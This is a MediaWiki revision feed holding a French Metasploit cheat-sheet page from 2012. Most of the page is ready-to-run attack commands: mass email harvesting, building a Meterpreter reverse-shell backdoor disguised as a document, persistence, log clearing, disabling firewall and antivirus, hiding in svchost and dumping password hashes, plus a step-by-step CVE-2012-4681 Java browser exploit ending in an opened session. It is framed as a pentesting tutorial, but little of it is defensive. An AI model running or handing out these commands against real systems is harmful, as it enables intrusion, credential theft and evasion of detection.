<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
	<id>https://futex.re/mediawiki/index.php?action=history&amp;feed=atom&amp;title=Metasploit</id>
	<title>Metasploit - Historique des versions</title>
	<link rel="self" type="application/atom+xml" href="https://futex.re/mediawiki/index.php?action=history&amp;feed=atom&amp;title=Metasploit"/>
	<link rel="alternate" type="text/html" href="https://futex.re/mediawiki/index.php?title=Metasploit&amp;action=history"/>
	<updated>2026-05-13T15:34:42Z</updated>
	<subtitle>Historique des versions pour cette page sur le wiki</subtitle>
	<generator>MediaWiki 1.39.17</generator>
	<entry>
		<id>https://futex.re/mediawiki/index.php?title=Metasploit&amp;diff=1818&amp;oldid=prev</id>
		<title>Futex : /* Exploitation de la faille Java 7 u6 avec Metasploit */</title>
		<link rel="alternate" type="text/html" href="https://futex.re/mediawiki/index.php?title=Metasploit&amp;diff=1818&amp;oldid=prev"/>
		<updated>2012-09-23T14:14:23Z</updated>

		<summary type="html">&lt;p&gt;&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Exploitation de la faille Java 7 u6 avec Metasploit&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Nouvelle page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;== Collecte de mails en masse ==&lt;br /&gt;
&lt;br /&gt;
  msf &amp;gt;search collector&amp;lt;br&amp;gt;&lt;br /&gt;
  msf &amp;gt; use gather/search_email_collector&lt;br /&gt;
  msf auxiliary(search_email_collector) &amp;gt; show options&amp;lt;br&amp;gt;&lt;br /&gt;
  Module options (auxiliary/gather/search_email_collector):&amp;lt;br&amp;gt;&lt;br /&gt;
   Name           Current Setting  Required  Description&lt;br /&gt;
   ----           ---------------  --------  -----------&lt;br /&gt;
   DOMAIN                          yes       The domain name to locate email addresses for&lt;br /&gt;
   OUTFILE                         no        A filename to store the generated email list&lt;br /&gt;
   SEARCH_BING    true             yes       Enable Bing as a backend search engine&lt;br /&gt;
   SEARCH_GOOGLE  true             yes       Enable Google as a backend search engine&lt;br /&gt;
   SEARCH_YAHOO   true             yes       Enable Yahoo! as a backend search engine&amp;lt;br&amp;gt;   &lt;br /&gt;
  msf auxiliary(search_email_collector) &amp;gt; set DOMAIN gmail.com&lt;br /&gt;
  DOMAIN =&amp;gt; gmail.com&lt;br /&gt;
  msf auxiliary(search_email_collector) &amp;gt; set OUTFILE /root/domain.gmail&lt;br /&gt;
  OUTFILE =&amp;gt; /root/domain.gmail&lt;br /&gt;
  msf auxiliary(search_email_collector) &amp;gt; set SEARCH_BING false&lt;br /&gt;
  SEARCH_BING =&amp;gt; false&lt;br /&gt;
  msf auxiliary(search_email_collector) &amp;gt; set SEARCH_YAHOO false&lt;br /&gt;
  SEARCH_YAHOO =&amp;gt; false&lt;br /&gt;
  msf auxiliary(search_email_collector) &amp;gt; run&lt;br /&gt;
&lt;br /&gt;
== Scan Samba ==&lt;br /&gt;
  msf &amp;gt;use auxiliary/scanner/smb/smb_version&lt;br /&gt;
  msf &amp;gt;set RHOST=192.168.1.1/24&lt;br /&gt;
  msf &amp;gt;set THREADS 75&lt;br /&gt;
  msf &amp;gt;run&lt;br /&gt;
&lt;br /&gt;
== Autoexecuter l&amp;#039;exploit au boot ==&lt;br /&gt;
&lt;br /&gt;
   msf &amp;gt;run persistence -A -X -p 10000 -r 192.168.56.1&lt;br /&gt;
&lt;br /&gt;
== Effacer ces traces==&lt;br /&gt;
  msf &amp;gt; clearev&lt;br /&gt;
&lt;br /&gt;
== Malware reverse TCP ==&lt;br /&gt;
&lt;br /&gt;
  msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 Desktop &amp;gt; test.jpg&lt;br /&gt;
&lt;br /&gt;
ou&lt;br /&gt;
&lt;br /&gt;
  msf &amp;gt;use payload/windows/meterpreter/reverse_tcp&lt;br /&gt;
  msf &amp;gt;set LHOST 192.168.1.1/24&lt;br /&gt;
  msf &amp;gt;set LPORT 4444&lt;br /&gt;
  msf &amp;gt;set EXITFUNC process&lt;br /&gt;
Générer le malware:&lt;br /&gt;
  msf &amp;gt;generate -t exe -f /tmp/backdoor.exe&lt;br /&gt;
ou&lt;br /&gt;
 &lt;br /&gt;
  ./msfvenom -x /tmp/wordpad.exe -k -p windows/meterpreter/reverse_tcp -f exe LHOST=192.168.120.65 LPORT=8080 &amp;gt; /tmp/Document.doc.exe&lt;br /&gt;
&lt;br /&gt;
  -x binaire template&lt;br /&gt;
  -k permet de laisser le template fonctionnel&lt;br /&gt;
  -p le payload a exec&lt;br /&gt;
  -f le format de sortie&lt;br /&gt;
  LHOST LPORT variable&lt;br /&gt;
&lt;br /&gt;
Lancer le handler&lt;br /&gt;
  msf &amp;gt;exploit -j&lt;br /&gt;
&lt;br /&gt;
ou &lt;br /&gt;
  #On lance msfconsole&lt;br /&gt;
  msf  use exploit/multi/handler &lt;br /&gt;
  msf  exploit(handler) &amp;gt; set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;
  msf  exploit(handler) &amp;gt; set LHOST 192.168.120.65&lt;br /&gt;
  msf  exploit(handler) &amp;gt; set LPORT 8080&lt;br /&gt;
  msf  exploit(handler) &amp;gt; exploit&lt;br /&gt;
  [*] Started reverse handler on 192.168.120.65:8080 &lt;br /&gt;
  [*] Starting the payload handler...&lt;br /&gt;
  [*] Sending stage (752128 bytes) to 192.168.120.63&lt;br /&gt;
  [*] Meterpreter session 3 opened (192.168.120.65:8080 -&amp;gt; 192.168.120.63:1475) at Wed Apr 18 10:55:24 +0200 2012&lt;br /&gt;
&lt;br /&gt;
== Tips Post-exploitation ==&lt;br /&gt;
&lt;br /&gt;
Killer le firewall&lt;br /&gt;
  meterpreter &amp;gt; run getcountermeasure -d&lt;br /&gt;
Killer les antivirus&lt;br /&gt;
  meterpreter &amp;gt; run killav&lt;br /&gt;
Bypasser les antivirus&lt;br /&gt;
  meterpreter &amp;gt; run virusscan_bypass -h&lt;br /&gt;
Masquer le payload&lt;br /&gt;
  meterpreter &amp;gt; migrate $PID (PID du process sous lequel on veut se masquer, généralement svhost. Faire un ps pour les voir avant :))&lt;br /&gt;
Prendre une capture d&amp;#039;écran&lt;br /&gt;
  meterpreter &amp;gt;run screenspy -h&lt;br /&gt;
Activer TSE (remote desktop) chez la victime&lt;br /&gt;
  meterpreter &amp;gt; run getgui -e&lt;br /&gt;
Activer telnet sur la victime&lt;br /&gt;
  meterpreter &amp;gt; gettelnet -h&lt;br /&gt;
Vérifier si on est sur une VM&lt;br /&gt;
  meterpreter &amp;gt; run checkvm&lt;br /&gt;
Voler les mots de passes&lt;br /&gt;
  meterpreter &amp;gt; run hashdump&lt;br /&gt;
&lt;br /&gt;
== Exploitation de la faille Java 7 u6 avec Metasploit ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Fin Aout un 0day touchant Java a été publié [http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html CVE-2012-4681]. Dans la foulée un exploit a été publier dans [http://www.metasploit.com/ Metasploit].&lt;br /&gt;
Cette faille permet à une personne malveillante de prendre le contrôle à distance d&amp;#039;une machine. &lt;br /&gt;
&lt;br /&gt;
Nous allons voir comment cet exploit fonctionne et cela servira par la même occasion d&amp;#039;introduction à Metasploit.&lt;br /&gt;
&lt;br /&gt;
Metasploit est un super outil que tout pentesteur se doit de connaître. Il s&amp;#039;agit d&amp;#039;un framework open-source fournissant des outils au développement d&amp;#039;exploits (logiciels permettant d&amp;#039;exploiter une faille de sécurité) et facilitant aussi l&amp;#039;exécution de ce code. Il est disponible sous Linux et Windows à cette adresse: [http://www.metasploit.com/ Metasploit]&lt;br /&gt;
&lt;br /&gt;
== L&amp;#039;attaque en détails ==&lt;br /&gt;
&lt;br /&gt;
On lance Metasploit:&lt;br /&gt;
  # msfconsole&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Metasploit 1.jpg]]&lt;br /&gt;
&lt;br /&gt;
On arrive à un prompt, pour rechercher notre exploit:&lt;br /&gt;
  msf &amp;gt; search jre17&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Metasploit 2.jpg]]&lt;br /&gt;
 &lt;br /&gt;
Pour le sélectionner:&lt;br /&gt;
  msf &amp;gt; use exploit/multi/browser/java_jre17_exec&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Metasploit 3.jpg]]&lt;br /&gt;
&lt;br /&gt;
Afficher les options de l&amp;#039;exploit:&lt;br /&gt;
  msf &amp;gt; show options&lt;br /&gt;
[[Fichier:Metasploit 4.jpg]]&lt;br /&gt;
&lt;br /&gt;
Il faut qu&amp;#039;on choisisse notre payload&lt;br /&gt;
  msf &amp;gt; exploit(java_jre17_exec) &amp;gt; set payload java/meterpreter/reverse_tcp&lt;br /&gt;
[[Fichier:Metasploit 5.jpg]]&lt;br /&gt;
&lt;br /&gt;
Afficher les options du payload:&lt;br /&gt;
  msf &amp;gt; exploit(java_jre17_exec) &amp;gt; show options&lt;br /&gt;
[[Fichier:Metasploit 6.jpg]]&lt;br /&gt;
&lt;br /&gt;
On doit setter l&amp;#039;adresse de notre serveur pirate.&lt;br /&gt;
  msf &amp;gt; exploit(java_jre17_exec) &amp;gt; set lhost 192.168.1.145&lt;br /&gt;
[[Fichier:Metasploit 7.jpg]]&lt;br /&gt;
&lt;br /&gt;
On est déjà prêt, on peut lancer notre exploit, comme quoi c&amp;#039;est tout simple!&amp;lt;br&amp;gt;&lt;br /&gt;
  msf &amp;gt;  exploit(java_jre17_exec) &amp;gt; exploit &lt;br /&gt;
[[Fichier:Metasploit 8.jpg]]&lt;br /&gt;
&lt;br /&gt;
On a plus qu&amp;#039;à attendre une connexion sur l&amp;#039;URL http://192.168.1.145:8080/62rkJsBLCzb&amp;lt;br&amp;gt;&lt;br /&gt;
[[Fichier:Metasploit 9.jpg]]&lt;br /&gt;
&lt;br /&gt;
Et une session s&amp;#039;ouvre dans notre Metasploit:&amp;lt;br&amp;gt;&lt;br /&gt;
[[Fichier:Metasploit 10.jpg]]&lt;br /&gt;
&lt;br /&gt;
Lister les sessions actives avec la commande &lt;br /&gt;
  msf &amp;gt; sessions -l&lt;br /&gt;
Pour se connecter à une session&lt;br /&gt;
  msf &amp;gt; sessions -i 1&lt;br /&gt;
[[Fichier:Metasploit 11.jpg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== L&amp;#039;attaque sans se prendre la tête ==&lt;br /&gt;
&lt;br /&gt;
  # msfconsole&lt;br /&gt;
  msf &amp;gt; use exploit/multi/browser/java_jre17_exec&lt;br /&gt;
  msf  exploit(java_jre17_exec) &amp;gt; set payload java/meterpreter/reverse_tcp&lt;br /&gt;
  msf  exploit(java_jre17_exec) &amp;gt; set lhost 192.168.1.145&lt;br /&gt;
  msf  exploit(java_jre17_exec) &amp;gt; exploit&lt;br /&gt;
  --- On attends une connexion ---&lt;br /&gt;
  msf  exploit(java_jre17_exec) &amp;gt; sessions -i 1&lt;/div&gt;</summary>
		<author><name>Futex</name></author>
	</entry>
</feed>